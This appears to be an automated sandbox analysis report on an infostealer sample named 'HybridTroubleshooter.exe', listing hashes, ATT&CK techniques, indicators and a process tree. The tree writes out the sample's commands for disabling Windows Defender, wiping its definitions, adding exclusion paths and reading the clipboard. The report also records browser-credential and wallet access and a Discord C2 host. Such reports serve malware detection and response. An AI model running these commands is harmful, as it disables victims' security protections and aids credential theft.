b3dff4a7df3913a8ba790c89e44526bb71951f7e9ca0d321b026080ff57780ee

Analysis

max time kernel
91s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 04:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HybridTroubleshooter.exe
Size

6.0MB
MD5

7b6bf2e9439976470abed7e28aeb7e50
SHA1

79ced0071d376428aa98d951e2524845bd1d87b1
SHA256

b3dff4a7df3913a8ba790c89e44526bb71951f7e9ca0d321b026080ff57780ee
SHA512

b4e0ebff67876398a38f2ef05c6d3b07443b311298549fa1681c49653b5f018b71f63af7d309ce40c6c2a2084572119c9aa02ffb44d4b4e4046a612ae105fa39
SSDEEP

98304:4jcZrXqkqSnWyL4afkhk9Y+YNwh1SMCJbzRnPJ8iE/56YiaDJ1n6hB0LncZMn:9R9L4ack9Y7m7SMYNPKBFn6hqgi

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1696	powershell.exe
3212	powershell.exe
3572	powershell.exe
3820	powershell.exe
4284	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0007000000023cbd-21.dat	acprotect
behavioral2/files/0x0007000000023cb0-28.dat	acprotect
behavioral2/files/0x0007000000023cbb-30.dat	acprotect
behavioral2/files/0x0007000000023cba-34.dat	acprotect
behavioral2/files/0x0007000000023cb7-48.dat	acprotect
behavioral2/files/0x0007000000023cb6-47.dat	acprotect
behavioral2/files/0x0007000000023cb5-46.dat	acprotect
behavioral2/files/0x0007000000023cb4-45.dat	acprotect
behavioral2/files/0x0007000000023cb3-44.dat	acprotect
behavioral2/files/0x0007000000023cb2-43.dat	acprotect
behavioral2/files/0x0007000000023cb1-42.dat	acprotect
behavioral2/files/0x0007000000023caf-41.dat	acprotect
behavioral2/files/0x0007000000023cc2-40.dat	acprotect
behavioral2/files/0x0007000000023cc1-39.dat	acprotect
behavioral2/files/0x0007000000023cc0-38.dat	acprotect
behavioral2/files/0x0007000000023cbc-35.dat	acprotect

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1528	cmd.exe
4964	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4076	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe
4552	HybridTroubleshooter.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1540	tasklist.exe
2108	tasklist.exe
1292	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cbd-21.dat	upx
behavioral2/memory/4552-25-0x0000000075480000-0x000000007598A000-memory.dmp	upx
behavioral2/files/0x0007000000023cb0-28.dat	upx
behavioral2/memory/4552-32-0x0000000075420000-0x000000007542D000-memory.dmp	upx
behavioral2/memory/4552-31-0x0000000075430000-0x000000007544F000-memory.dmp	upx
behavioral2/files/0x0007000000023cbb-30.dat	upx
behavioral2/files/0x0007000000023cba-34.dat	upx
behavioral2/files/0x0007000000023cb7-48.dat	upx
behavioral2/files/0x0007000000023cb6-47.dat	upx
behavioral2/files/0x0007000000023cb5-46.dat	upx
behavioral2/files/0x0007000000023cb4-45.dat	upx
behavioral2/files/0x0007000000023cb3-44.dat	upx
behavioral2/files/0x0007000000023cb2-43.dat	upx
behavioral2/files/0x0007000000023cb1-42.dat	upx
behavioral2/files/0x0007000000023caf-41.dat	upx
behavioral2/files/0x0007000000023cc2-40.dat	upx
behavioral2/files/0x0007000000023cc1-39.dat	upx
behavioral2/files/0x0007000000023cc0-38.dat	upx
behavioral2/files/0x0007000000023cbc-35.dat	upx
behavioral2/memory/4552-54-0x00000000753F0000-0x0000000075417000-memory.dmp	upx
behavioral2/memory/4552-56-0x00000000753D0000-0x00000000753E8000-memory.dmp	upx
behavioral2/memory/4552-58-0x00000000753B0000-0x00000000753CB000-memory.dmp	upx
behavioral2/memory/4552-60-0x0000000075270000-0x00000000753A6000-memory.dmp	upx
behavioral2/memory/4552-62-0x0000000075250000-0x0000000075266000-memory.dmp	upx
behavioral2/memory/4552-64-0x0000000075200000-0x000000007520C000-memory.dmp	upx
behavioral2/memory/4552-66-0x00000000751D0000-0x00000000751F8000-memory.dmp	upx
behavioral2/memory/4552-72-0x0000000075130000-0x00000000751C4000-memory.dmp	upx
behavioral2/memory/4552-74-0x0000000074ED0000-0x000000007512A000-memory.dmp	upx
behavioral2/memory/4552-71-0x0000000075430000-0x000000007544F000-memory.dmp	upx
behavioral2/memory/4552-79-0x00000000753F0000-0x0000000075417000-memory.dmp	upx
behavioral2/memory/4552-78-0x0000000074E50000-0x0000000074E5C000-memory.dmp	upx
behavioral2/memory/4552-77-0x0000000074E60000-0x0000000074E70000-memory.dmp	upx
behavioral2/memory/4552-70-0x0000000075480000-0x000000007598A000-memory.dmp	upx
behavioral2/memory/4552-83-0x0000000074D30000-0x0000000074E48000-memory.dmp	upx
behavioral2/memory/4552-84-0x00000000753B0000-0x00000000753CB000-memory.dmp	upx
behavioral2/memory/4552-87-0x0000000075270000-0x00000000753A6000-memory.dmp	upx
behavioral2/memory/4552-90-0x0000000075250000-0x0000000075266000-memory.dmp	upx
behavioral2/memory/4552-194-0x00000000751D0000-0x00000000751F8000-memory.dmp	upx
behavioral2/memory/4552-204-0x0000000075130000-0x00000000751C4000-memory.dmp	upx
behavioral2/memory/4552-219-0x0000000074ED0000-0x000000007512A000-memory.dmp	upx
behavioral2/memory/4552-287-0x0000000075430000-0x000000007544F000-memory.dmp	upx
behavioral2/memory/4552-286-0x0000000075480000-0x000000007598A000-memory.dmp	upx
behavioral2/memory/4552-397-0x0000000075480000-0x000000007598A000-memory.dmp	upx
behavioral2/memory/4552-403-0x0000000075270000-0x00000000753A6000-memory.dmp	upx
behavioral2/memory/4552-398-0x0000000075430000-0x000000007544F000-memory.dmp	upx
behavioral2/memory/4552-487-0x0000000074ED0000-0x000000007512A000-memory.dmp	upx
behavioral2/memory/4552-492-0x00000000753B0000-0x00000000753CB000-memory.dmp	upx
behavioral2/memory/4552-501-0x0000000074D30000-0x0000000074E48000-memory.dmp	upx
behavioral2/memory/4552-500-0x0000000074E50000-0x0000000074E5C000-memory.dmp	upx
behavioral2/memory/4552-499-0x0000000074E60000-0x0000000074E70000-memory.dmp	upx
behavioral2/memory/4552-498-0x0000000075480000-0x000000007598A000-memory.dmp	upx
behavioral2/memory/4552-497-0x0000000075130000-0x00000000751C4000-memory.dmp	upx
behavioral2/memory/4552-496-0x00000000751D0000-0x00000000751F8000-memory.dmp	upx
behavioral2/memory/4552-495-0x0000000075200000-0x000000007520C000-memory.dmp	upx
behavioral2/memory/4552-494-0x0000000075250000-0x0000000075266000-memory.dmp	upx
behavioral2/memory/4552-493-0x0000000075270000-0x00000000753A6000-memory.dmp	upx
behavioral2/memory/4552-491-0x00000000753D0000-0x00000000753E8000-memory.dmp	upx
behavioral2/memory/4552-490-0x00000000753F0000-0x0000000075417000-memory.dmp	upx
behavioral2/memory/4552-489-0x0000000075430000-0x000000007544F000-memory.dmp	upx
behavioral2/memory/4552-488-0x0000000075420000-0x000000007542D000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HybridTroubleshooter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HybridTroubleshooter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
468	cmd.exe
3480	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3320	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4012	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1696	powershell.exe
1696	powershell.exe
3212	powershell.exe
3212	powershell.exe
3572	powershell.exe
3572	powershell.exe
1696	powershell.exe
1696	powershell.exe
4964	powershell.exe
4964	powershell.exe
3692	powershell.exe
3692	powershell.exe
3212	powershell.exe
3572	powershell.exe
4964	powershell.exe
3692	powershell.exe
3820	powershell.exe
3820	powershell.exe
3264	powershell.exe
3264	powershell.exe
4284	powershell.exe
4284	powershell.exe
3460	powershell.exe
3460	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1540	tasklist.exe
Token: SeDebugPrivilege	2108	tasklist.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeIncreaseQuotaPrivilege	1740	WMIC.exe
Token: SeSecurityPrivilege	1740	WMIC.exe
Token: SeTakeOwnershipPrivilege	1740	WMIC.exe
Token: SeLoadDriverPrivilege	1740	WMIC.exe
Token: SeSystemProfilePrivilege	1740	WMIC.exe
Token: SeSystemtimePrivilege	1740	WMIC.exe
Token: SeProfSingleProcessPrivilege	1740	WMIC.exe
Token: SeIncBasePriorityPrivilege	1740	WMIC.exe
Token: SeCreatePagefilePrivilege	1740	WMIC.exe
Token: SeBackupPrivilege	1740	WMIC.exe
Token: SeRestorePrivilege	1740	WMIC.exe
Token: SeShutdownPrivilege	1740	WMIC.exe
Token: SeDebugPrivilege	1740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1740	WMIC.exe
Token: SeRemoteShutdownPrivilege	1740	WMIC.exe
Token: SeUndockPrivilege	1740	WMIC.exe
Token: SeManageVolumePrivilege	1740	WMIC.exe
Token: 33	1740	WMIC.exe
Token: 34	1740	WMIC.exe
Token: 35	1740	WMIC.exe
Token: 36	1740	WMIC.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	1292	tasklist.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeIncreaseQuotaPrivilege	1740	WMIC.exe
Token: SeSecurityPrivilege	1740	WMIC.exe
Token: SeTakeOwnershipPrivilege	1740	WMIC.exe
Token: SeLoadDriverPrivilege	1740	WMIC.exe
Token: SeSystemProfilePrivilege	1740	WMIC.exe
Token: SeSystemtimePrivilege	1740	WMIC.exe
Token: SeProfSingleProcessPrivilege	1740	WMIC.exe
Token: SeIncBasePriorityPrivilege	1740	WMIC.exe
Token: SeCreatePagefilePrivilege	1740	WMIC.exe
Token: SeBackupPrivilege	1740	WMIC.exe
Token: SeRestorePrivilege	1740	WMIC.exe
Token: SeShutdownPrivilege	1740	WMIC.exe
Token: SeDebugPrivilege	1740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1740	WMIC.exe
Token: SeRemoteShutdownPrivilege	1740	WMIC.exe
Token: SeUndockPrivilege	1740	WMIC.exe
Token: SeManageVolumePrivilege	1740	WMIC.exe
Token: 33	1740	WMIC.exe
Token: 34	1740	WMIC.exe
Token: 35	1740	WMIC.exe
Token: 36	1740	WMIC.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	3820	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeIncreaseQuotaPrivilege	2652	WMIC.exe
Token: SeSecurityPrivilege	2652	WMIC.exe
Token: SeTakeOwnershipPrivilege	2652	WMIC.exe
Token: SeLoadDriverPrivilege	2652	WMIC.exe
Token: SeSystemProfilePrivilege	2652	WMIC.exe
Token: SeSystemtimePrivilege	2652	WMIC.exe
Token: SeProfSingleProcessPrivilege	2652	WMIC.exe
Token: SeIncBasePriorityPrivilege	2652	WMIC.exe
Token: SeCreatePagefilePrivilege	2652	WMIC.exe
Token: SeBackupPrivilege	2652	WMIC.exe
Token: SeRestorePrivilege	2652	WMIC.exe
Token: SeShutdownPrivilege	2652	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3180 wrote to memory of 4552	3180	HybridTroubleshooter.exe	85
PID 3180 wrote to memory of 4552	3180	HybridTroubleshooter.exe	85
PID 3180 wrote to memory of 4552	3180	HybridTroubleshooter.exe	85
PID 4552 wrote to memory of 4832	4552	HybridTroubleshooter.exe	86
PID 4552 wrote to memory of 4832	4552	HybridTroubleshooter.exe	86
PID 4552 wrote to memory of 4832	4552	HybridTroubleshooter.exe	86
PID 4552 wrote to memory of 4564	4552	HybridTroubleshooter.exe	87
PID 4552 wrote to memory of 4564	4552	HybridTroubleshooter.exe	87
PID 4552 wrote to memory of 4564	4552	HybridTroubleshooter.exe	87
PID 4552 wrote to memory of 2372	4552	HybridTroubleshooter.exe	89
PID 4552 wrote to memory of 2372	4552	HybridTroubleshooter.exe	89
PID 4552 wrote to memory of 2372	4552	HybridTroubleshooter.exe	89
PID 4832 wrote to memory of 1696	4832	cmd.exe	92
PID 4832 wrote to memory of 1696	4832	cmd.exe	92
PID 4832 wrote to memory of 1696	4832	cmd.exe	92
PID 4552 wrote to memory of 4748	4552	HybridTroubleshooter.exe	93
PID 4552 wrote to memory of 4748	4552	HybridTroubleshooter.exe	93
PID 4552 wrote to memory of 4748	4552	HybridTroubleshooter.exe	93
PID 4552 wrote to memory of 4660	4552	HybridTroubleshooter.exe	94
PID 4552 wrote to memory of 4660	4552	HybridTroubleshooter.exe	94
PID 4552 wrote to memory of 4660	4552	HybridTroubleshooter.exe	94
PID 4552 wrote to memory of 1468	4552	HybridTroubleshooter.exe	97
PID 4552 wrote to memory of 1468	4552	HybridTroubleshooter.exe	97
PID 4552 wrote to memory of 1468	4552	HybridTroubleshooter.exe	97
PID 4552 wrote to memory of 4284	4552	HybridTroubleshooter.exe	99
PID 4552 wrote to memory of 4284	4552	HybridTroubleshooter.exe	99
PID 4552 wrote to memory of 4284	4552	HybridTroubleshooter.exe	99
PID 4552 wrote to memory of 4916	4552	HybridTroubleshooter.exe	140
PID 4552 wrote to memory of 4916	4552	HybridTroubleshooter.exe	140
PID 4552 wrote to memory of 4916	4552	HybridTroubleshooter.exe	140
PID 4552 wrote to memory of 1528	4552	HybridTroubleshooter.exe	98
PID 4552 wrote to memory of 1528	4552	HybridTroubleshooter.exe	98
PID 4552 wrote to memory of 1528	4552	HybridTroubleshooter.exe	98
PID 2372 wrote to memory of 3212	2372	cmd.exe	105
PID 2372 wrote to memory of 3212	2372	cmd.exe	105
PID 2372 wrote to memory of 3212	2372	cmd.exe	105
PID 4748 wrote to memory of 2108	4748	cmd.exe	106
PID 4748 wrote to memory of 2108	4748	cmd.exe	106
PID 4748 wrote to memory of 2108	4748	cmd.exe	106
PID 4660 wrote to memory of 1540	4660	cmd.exe	107
PID 4660 wrote to memory of 1540	4660	cmd.exe	107
PID 4660 wrote to memory of 1540	4660	cmd.exe	107
PID 4564 wrote to memory of 3572	4564	cmd.exe	108
PID 4564 wrote to memory of 3572	4564	cmd.exe	108
PID 4564 wrote to memory of 3572	4564	cmd.exe	108
PID 4552 wrote to memory of 2368	4552	HybridTroubleshooter.exe	109
PID 4552 wrote to memory of 2368	4552	HybridTroubleshooter.exe	109
PID 4552 wrote to memory of 2368	4552	HybridTroubleshooter.exe	109
PID 4552 wrote to memory of 468	4552	HybridTroubleshooter.exe	110
PID 4552 wrote to memory of 468	4552	HybridTroubleshooter.exe	110
PID 4552 wrote to memory of 468	4552	HybridTroubleshooter.exe	110
PID 4552 wrote to memory of 3964	4552	HybridTroubleshooter.exe	111
PID 4552 wrote to memory of 3964	4552	HybridTroubleshooter.exe	111
PID 4552 wrote to memory of 3964	4552	HybridTroubleshooter.exe	111
PID 4284 wrote to memory of 1292	4284	cmd.exe	116
PID 4284 wrote to memory of 1292	4284	cmd.exe	116
PID 4284 wrote to memory of 1292	4284	cmd.exe	116
PID 1468 wrote to memory of 1740	1468	cmd.exe	115
PID 1468 wrote to memory of 1740	1468	cmd.exe	115
PID 1468 wrote to memory of 1740	1468	cmd.exe	115
PID 4916 wrote to memory of 2928	4916	cmd.exe	118
PID 4916 wrote to memory of 2928	4916	cmd.exe	118
PID 4916 wrote to memory of 2928	4916	cmd.exe	118
PID 1528 wrote to memory of 4964	1528	cmd.exe	117

C:\Users\Admin\AppData\Local\Temp\HybridTroubleshooter.exe
"C:\Users\Admin\AppData\Local\Temp\HybridTroubleshooter.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3180
- C:\Users\Admin\AppData\Local\Temp\HybridTroubleshooter.exe
  "C:\Users\Admin\AppData\Local\Temp\HybridTroubleshooter.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HybridTroubleshooter.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4832
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HybridTroubleshooter.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‍ .scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4748
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1468
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4284
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
